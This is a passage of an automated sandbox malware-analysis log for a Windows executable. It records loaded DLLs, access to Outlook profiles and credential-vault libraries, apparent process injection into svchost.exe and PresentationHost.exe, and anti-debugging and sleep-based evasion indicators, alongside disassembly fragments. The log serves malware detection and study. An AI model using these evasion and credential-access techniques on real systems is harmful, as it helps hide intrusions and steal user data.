          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeSection loaded: ntmarta.dllJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeSection loaded: mswsock.dllJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeSection loaded: dnsapi.dllJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeSection loaded: iphlpapi.dllJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeSection loaded: rasadhlp.dllJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeSection loaded: fwpuclnt.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: version.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mscoree.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wininet.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: urlmon.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: iertutil.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: srvcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netutils.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: kernel.appcore.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: uxtheme.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: ieframe.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: netapi32.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: userenv.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winhttp.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wkscli.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: sspicli.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: windows.storage.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wldp.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: profapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: secur32.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: mlang.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: propsys.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: winsqlite3.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: vaultcli.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: wintypes.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: dpapi.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeSection loaded: cryptbase.dllJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{3C374A40-BAE4-11CF-BF7D-00AA006946EE}\InProcServer32Jump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
          Source: nJ8mJTmMf0.exeStatic file information: File size 1234944 > 1048576
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
          Source: nJ8mJTmMf0.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
          Source: Binary string: PresentationHost.pdbGCTL source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121058852.000000000080E000.00000002.00000001.01000000.00000005.sdmp
          Source: Binary string: wntdll.pdbUGP source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: nJ8mJTmMf0.exe, 00000000.00000003.1661528296.0000000003D40000.00000004.00001000.00020000.00000000.sdmp, nJ8mJTmMf0.exe, 00000000.00000003.1660936277.0000000003EE0000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000002.1978035667.0000000003200000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1867131484.0000000002E00000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1868917972.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1978035667.000000000339E000.00000040.00001000.00020000.00000000.sdmp, PresentationHost.exe, PresentationHost.exe, 00000006.00000002.4122016791.0000000004EE0000.00000040.00001000.00020000.00000000.sdmp
          Source: Binary string: PresentationHost.pdb source: svchost.exe, 00000001.00000003.1940176962.0000000002C59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1940110790.0000000002C1A000.00000004.00000020.00020000.00000000.sdmp, TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000003.1910341128.000000000160B000.00000004.00000001.00020000.00000000.sdmp
          Source: Binary string: svchost.pdb source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4124406392.0000000005E8C000.00000004.80000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4122364070.000000000550C000.00000004.10000000.00040000.00000000.sdmp, PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmp, firefox.exe, 00000007.00000002.2315187674.000000001692C000.00000004.80000000.00040000.00000000.sdmp
          Source: nJ8mJTmMf0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
          Source: nJ8mJTmMf0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
          Source: nJ8mJTmMf0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
          Source: nJ8mJTmMf0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
          Source: nJ8mJTmMf0.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067C304 LoadLibraryA,GetProcAddress,0_2_0067C304
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00668719 push FFFFFF8Bh; iretd 0_2_0066871B
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062E94F push edi; ret 0_2_0062E951
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062EA68 push esi; ret 0_2_0062EA6A
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00628B85 push ecx; ret 0_2_00628B98
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062EC43 push esi; ret 0_2_0062EC45
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0062ED2C push edi; ret 0_2_0062ED2E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004070DB push gs; retf 1_2_004071B5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004130B3 push es; iretd 1_2_0041326B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407134 push gs; retf 1_2_004071B5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00403210 push eax; ret 1_2_00403212
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00408347 push 62E932ECh; ret 1_2_00408350
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040734F push cs; iretd 1_2_00407359
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00422C63 push edi; iretd 1_2_00422C6E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0040742D push cs; iretd 1_2_0040742E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00416483 push ebx; iretd 1_2_00416485
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00407551 push eax; ret 1_2_00407552
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004135E3 push esi; ret 1_2_004135EF
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_00413FD0 push dword ptr [eax+3Bh]; ret 1_2_00413FD5
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320225F pushad ; ret 1_2_032027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032027FA pushad ; ret 1_2_032027F9
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032309AD push ecx; mov dword ptr [esp], ecx1_2_032309B6
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320283D push eax; iretd 1_2_03202858
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0320135E push eax; iretd 1_2_03201369
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082FC83F pushfd ; ret 3_2_082FC840
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082ED067 push esi; ret 3_2_082ED073
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082F9C9C push esp; iretd 3_2_082F9CA0
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082ECCC7 push es; iretd 3_2_082ECCEF
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082FCDAD push ds; iretd 3_2_082FCDEE
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082FC6E7 push edi; iretd 3_2_082FC6F2
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exeCode function: 3_2_082EFF07 push ebx; iretd 3_2_082EFF09
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_04EE27FA pushad ; ret 6_2_04EE27F9
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604A35 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,MapVirtualKeyW,keybd_event,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00604A35
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006855FD IsWindowVisible,IsWindowEnabled,GetForegroundWindow,IsIconic,IsZoomed,0_2_006855FD
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006233C7 EncodePointer,__initp_misc_winsig,GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_006233C7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior

          Malware Analysis System Evasion

          barindex
          Switches to a custom stack to bypass stack traces
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI/Special instruction interceptor: Address: 3943244
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D324
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D7E4
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D944
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D504
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D544
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220D1E4
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE22210154
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI/Special instruction interceptor: Address: 7FFE2220DA44
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
          Source: C:\Windows\SysWOW64\PresentationHost.exeWindow / User API: threadDelayed 2165Jump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeWindow / User API: threadDelayed 7808Jump to behavior
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_0-98258
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI coverage: 4.7 %
          Source: C:\Windows\SysWOW64\svchost.exeAPI coverage: 0.6 %
          Source: C:\Windows\SysWOW64\PresentationHost.exeAPI coverage: 2.6 %
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684Thread sleep time: -80000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684Thread sleep time: -42000s >= -30000sJump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684Thread sleep count: 35 > 30Jump to behavior
          Source: C:\Program Files (x86)\PSNIHCXaKDrnALQsNgDQieIQUWGIiVdoeeQtERQzuwNNCmVpiZSCnJGsRqhVkcRLs\TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe TID: 7684Thread sleep time: -35000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668Thread sleep count: 2165 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668Thread sleep time: -4330000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668Thread sleep count: 7808 > 30Jump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exe TID: 7668Thread sleep time: -15616000s >= -30000sJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
          Source: C:\Windows\SysWOW64\PresentationHost.exeLast function: Thread delayed
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00664696 GetFileAttributesW,FindFirstFileW,FindClose,0_2_00664696
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C93C FindFirstFileW,FindClose,0_2_0066C93C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066C9C7 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,0_2_0066C9C7
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F200 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F200
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F35D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0066F35D
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066F65E FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066F65E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00663A2B FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663A2B
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00663D4E FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00663D4E
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0066BF27 FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,0_2_0066BF27
          Source: C:\Windows\SysWOW64\PresentationHost.exeCode function: 6_2_00B1BDA0 FindFirstFileW,FindNextFileW,FindClose,6_2_00B1BDA0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00604AFE GetVersionExW,GetCurrentProcess,IsWow64Process,GetNativeSystemInfo,FreeLibrary,GetSystemInfo,GetSystemInfo,0_2_00604AFE
          Source: TzzjhIsXBfyeXRQZvZSpYcTAWcByP.exe, 00000003.00000002.4121513549.0000000001690000.00000004.00000001.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dlli
          Source: PresentationHost.exe, 00000006.00000002.4121169221.0000000002E3E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
          Source: firefox.exe, 00000007.00000002.2316444293.0000026B9684C000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllKK
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI call chain: ExitProcess graph end nodegraph_0-97659
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeAPI call chain: ExitProcess graph end nodegraph_0-97230
          Source: C:\Windows\SysWOW64\svchost.exeProcess information queried: ProcessInformationJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\PresentationHost.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0327096E rdtsc 1_2_0327096E
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_004175E3 LdrLoadDll,1_2_004175E3
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_006741FD BlockInput,0_2_006741FD
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00603B4C GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00603B4C
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_00635CCC EncodePointer,EncodePointer,___crtIsPackagedApp,LoadLibraryExW,GetLastError,LoadLibraryExW,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,GetProcAddress,EncodePointer,IsDebuggerPresent,OutputDebugStringW,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,DecodePointer,0_2_00635CCC
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_0067C304 LoadLibraryA,GetProcAddress,0_2_0067C304
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_03943510 mov eax, dword ptr fs:[00000030h]0_2_03943510
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_039434B0 mov eax, dword ptr fs:[00000030h]0_2_039434B0
          Source: C:\Users\user\Desktop\nJ8mJTmMf0.exeCode function: 0_2_03941E70 mov eax, dword ptr fs:[00000030h]0_2_03941E70
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov ecx, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03308324 mov eax, dword ptr fs:[00000030h]1_2_03308324
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0326A30B mov eax, dword ptr fs:[00000030h]1_2_0326A30B
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_0322C310 mov ecx, dword ptr fs:[00000030h]1_2_0322C310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_03250310 mov ecx, dword ptr fs:[00000030h]1_2_03250310
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032D437C mov eax, dword ptr fs:[00000030h]1_2_032D437C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B2349 mov eax, dword ptr fs:[00000030h]1_2_032B2349
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 1_2_032B035C mov eax, dword ptr fs:[00000030h]1_2_032B035C
